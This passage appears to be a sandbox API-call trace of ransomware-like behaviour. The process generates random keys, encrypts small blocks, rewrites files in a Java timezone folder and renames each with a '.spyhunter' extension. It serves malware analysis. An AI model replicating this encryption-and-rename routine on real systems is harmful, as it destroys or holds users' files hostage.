[0167.713] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e630 | out: pbBuffer=0x248e630) returned 1 [0167.713] GetProcessHeap () returned 0x2c0000 [0167.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.713] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e628*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e628*=0x30) returned 1 [0167.713] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kiritimati" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kiritimati"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0167.714] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kiritimati") returned 62 [0167.714] StrStrW (lpFirst="Kiritimati", lpSrch=".txt") returned 0x0 [0167.714] GetProcessHeap () returned 0x2c0000 [0167.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.714] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e5ec*=0x59, lpOverlapped=0x0) returned 1 [0167.715] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffa7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.715] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x59, lpNumberOfBytesWritten=0x248e5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e5ec*=0x59, lpOverlapped=0x0) returned 1 [0167.715] GetProcessHeap () returned 0x2c0000 [0167.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.715] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.715] WriteFile (in: hFile=0x9c, lpBuffer=0x248e62c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5ec, lpOverlapped=0x0 | out: lpBuffer=0x248e62c*, lpNumberOfBytesWritten=0x248e5ec*=0x4, lpOverlapped=0x0) returned 1 [0167.715] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5ec, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5ec*=0x30, lpOverlapped=0x0) returned 1 [0167.716] CloseHandle (hObject=0x9c) returned 1 [0167.716] GetProcessHeap () returned 0x2c0000 [0167.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.716] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kiritimati.spyhunter") returned 72 [0167.716] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kiritimati" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kiritimati"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Kiritimati.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\kiritimati.spyhunter")) returned 1 [0167.717] GetProcessHeap () returned 0x2c0000 [0167.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.717] GetProcessHeap () returned 0x2c0000 [0167.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.717] GetProcessHeap () returned 0x2c0000 [0167.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4a70 | out: hHeap=0x2c0000) returned 1 [0167.717] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e630 | out: pbBuffer=0x248e630) returned 1 [0167.717] GetProcessHeap () returned 0x2c0000 [0167.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.717] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e628*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e628*=0x30) returned 1 [0167.717] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Johnston" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\johnston"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0167.718] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Johnston") returned 60 [0167.718] StrStrW (lpFirst="Johnston", lpSrch=".txt") returned 0x0 [0167.718] GetProcessHeap () returned 0x2c0000 [0167.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.719] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e5ec*=0x1b, lpOverlapped=0x0) returned 1 [0167.719] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.719] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x248e5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e5ec*=0x1b, lpOverlapped=0x0) returned 1 [0167.719] GetProcessHeap () returned 0x2c0000 [0167.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.720] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.720] WriteFile (in: hFile=0x9c, lpBuffer=0x248e62c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5ec, lpOverlapped=0x0 | out: lpBuffer=0x248e62c*, lpNumberOfBytesWritten=0x248e5ec*=0x4, lpOverlapped=0x0) returned 1 [0167.720] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5ec, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5ec*=0x30, lpOverlapped=0x0) returned 1 [0167.721] CloseHandle (hObject=0x9c) returned 1 [0167.721] GetProcessHeap () returned 0x2c0000 [0167.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.721] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Johnston.spyhunter") returned 70 [0167.722] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Johnston" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\johnston"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Johnston.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\johnston.spyhunter")) returned 1 [0167.722] GetProcessHeap () returned 0x2c0000 [0167.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.722] GetProcessHeap () returned 0x2c0000 [0167.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.722] GetProcessHeap () returned 0x2c0000 [0167.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec49a8 | out: hHeap=0x2c0000) returned 1 [0167.722] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e628 | out: pbBuffer=0x248e628) returned 1 [0167.723] GetProcessHeap () returned 0x2c0000 [0167.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.723] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e620*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e620*=0x30) returned 1 [0167.723] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Honolulu" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\honolulu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0167.723] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Honolulu") returned 60 [0167.723] StrStrW (lpFirst="Honolulu", lpSrch=".txt") returned 0x0 [0167.723] GetProcessHeap () returned 0x2c0000 [0167.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.723] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e5e4*=0x69, lpOverlapped=0x0) returned 1 [0167.724] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff97, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.724] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x69, lpNumberOfBytesWritten=0x248e5e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e5e4*=0x69, lpOverlapped=0x0) returned 1 [0167.724] GetProcessHeap () returned 0x2c0000 [0167.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.724] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.724] WriteFile (in: hFile=0x9c, lpBuffer=0x248e624*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5e4, lpOverlapped=0x0 | out: lpBuffer=0x248e624*, lpNumberOfBytesWritten=0x248e5e4*=0x4, lpOverlapped=0x0) returned 1 [0167.725] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5e4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5e4*=0x30, lpOverlapped=0x0) returned 1 [0167.725] CloseHandle (hObject=0x9c) returned 1 [0167.725] GetProcessHeap () returned 0x2c0000 [0167.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.725] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Honolulu.spyhunter") returned 70 [0167.725] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Honolulu" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\honolulu"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Honolulu.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\honolulu.spyhunter")) returned 1 [0167.725] GetProcessHeap () returned 0x2c0000 [0167.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.725] GetProcessHeap () returned 0x2c0000 [0167.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.726] GetProcessHeap () returned 0x2c0000 [0167.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec48e0 | out: hHeap=0x2c0000) returned 1 [0167.726] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e628 | out: pbBuffer=0x248e628) returned 1 [0167.726] GetProcessHeap () returned 0x2c0000 [0167.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.726] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e620*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e620*=0x30) returned 1 [0167.726] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guam" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\guam"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0167.726] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guam") returned 56 [0167.726] StrStrW (lpFirst="Guam", lpSrch=".txt") returned 0x0 [0167.726] GetProcessHeap () returned 0x2c0000 [0167.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.726] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e5e4*=0x41, lpOverlapped=0x0) returned 1 [0167.727] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.727] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x248e5e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e5e4*=0x41, lpOverlapped=0x0) returned 1 [0167.727] GetProcessHeap () returned 0x2c0000 [0167.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.727] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.727] WriteFile (in: hFile=0x9c, lpBuffer=0x248e624*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5e4, lpOverlapped=0x0 | out: lpBuffer=0x248e624*, lpNumberOfBytesWritten=0x248e5e4*=0x4, lpOverlapped=0x0) returned 1 [0167.728] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5e4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5e4*=0x30, lpOverlapped=0x0) returned 1 [0167.728] CloseHandle (hObject=0x9c) returned 1 [0167.728] GetProcessHeap () returned 0x2c0000 [0167.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.728] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guam.spyhunter") returned 66 [0167.728] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guam" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\guam"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guam.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\guam.spyhunter")) returned 1 [0167.728] GetProcessHeap () returned 0x2c0000 [0167.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.729] GetProcessHeap () returned 0x2c0000 [0167.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.729] GetProcessHeap () returned 0x2c0000 [0167.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec3940 | out: hHeap=0x2c0000) returned 1 [0167.731] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e620 | out: pbBuffer=0x248e620) returned 1 [0167.731] GetProcessHeap () returned 0x2c0000 [0167.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.731] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e618*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e618*=0x30) returned 1 [0167.731] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guadalcanal" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\guadalcanal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0167.732] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guadalcanal") returned 63 [0167.732] StrStrW (lpFirst="Guadalcanal", lpSrch=".txt") returned 0x0 [0167.732] GetProcessHeap () returned 0x2c0000 [0167.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.732] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e5dc*=0x41, lpOverlapped=0x0) returned 1 [0167.733] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.733] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x248e5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e5dc*=0x41, lpOverlapped=0x0) returned 1 [0167.733] GetProcessHeap () returned 0x2c0000 [0167.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.733] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.733] WriteFile (in: hFile=0x9c, lpBuffer=0x248e61c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5dc, lpOverlapped=0x0 | out: lpBuffer=0x248e61c*, lpNumberOfBytesWritten=0x248e5dc*=0x4, lpOverlapped=0x0) returned 1 [0167.734] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5dc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5dc*=0x30, lpOverlapped=0x0) returned 1 [0167.734] CloseHandle (hObject=0x9c) returned 1 [0167.734] GetProcessHeap () returned 0x2c0000 [0167.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.734] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guadalcanal.spyhunter") returned 73 [0167.734] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guadalcanal" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\guadalcanal"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guadalcanal.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\guadalcanal.spyhunter")) returned 1 [0167.734] GetProcessHeap () returned 0x2c0000 [0167.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.735] GetProcessHeap () returned 0x2c0000 [0167.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.735] GetProcessHeap () returned 0x2c0000 [0167.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4818 | out: hHeap=0x2c0000) returned 1 [0167.735] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e620 | out: pbBuffer=0x248e620) returned 1 [0167.735] GetProcessHeap () returned 0x2c0000 [0167.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.735] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e618*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e618*=0x30) returned 1 [0167.735] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Gambier" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\gambier"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0167.735] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Gambier") returned 59 [0167.735] StrStrW (lpFirst="Gambier", lpSrch=".txt") returned 0x0 [0167.735] GetProcessHeap () returned 0x2c0000 [0167.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.736] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e5dc*=0x41, lpOverlapped=0x0) returned 1 [0167.736] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.736] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x248e5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e5dc*=0x41, lpOverlapped=0x0) returned 1 [0167.736] GetProcessHeap () returned 0x2c0000 [0167.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.737] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.737] WriteFile (in: hFile=0x9c, lpBuffer=0x248e61c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e5dc, lpOverlapped=0x0 | out: lpBuffer=0x248e61c*, lpNumberOfBytesWritten=0x248e5dc*=0x4, lpOverlapped=0x0) returned 1 [0167.737] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e5dc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e5dc*=0x30, lpOverlapped=0x0) returned 1 [0167.737] CloseHandle (hObject=0x9c) returned 1 [0167.737] GetProcessHeap () returned 0x2c0000 [0167.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.737] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Gambier.spyhunter") returned 69 [0167.737] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Gambier" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\gambier"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Gambier.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\gambier.spyhunter")) returned 1 [0167.738] GetProcessHeap () returned 0x2c0000 [0167.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.738] GetProcessHeap () returned 0x2c0000 [0167.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0167.738] GetProcessHeap () returned 0x2c0000 [0167.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec3880 | out: hHeap=0x2c0000) returned 1 [0167.738] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e618 | out: pbBuffer=0x248e618) returned 1 [0167.738] GetProcessHeap () returned 0x2c0000 [0167.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0167.738] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e610*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e610*=0x30) returned 1 [0167.738] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Galapagos" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\galapagos"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0167.738] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Galapagos") returned 61 [0167.738] StrStrW (lpFirst="Galapagos", lpSrch=".txt") returned 0x0 [0167.739] GetProcessHeap () returned 0x2c0000 [0167.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.739] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e5d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e5d4*=0x4d, lpOverlapped=0x0) returned 1 [0167.739] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.739] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x248e5d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e5d4*=0x4d, lpOverlapped=0x0) returned 1 [0167.739] 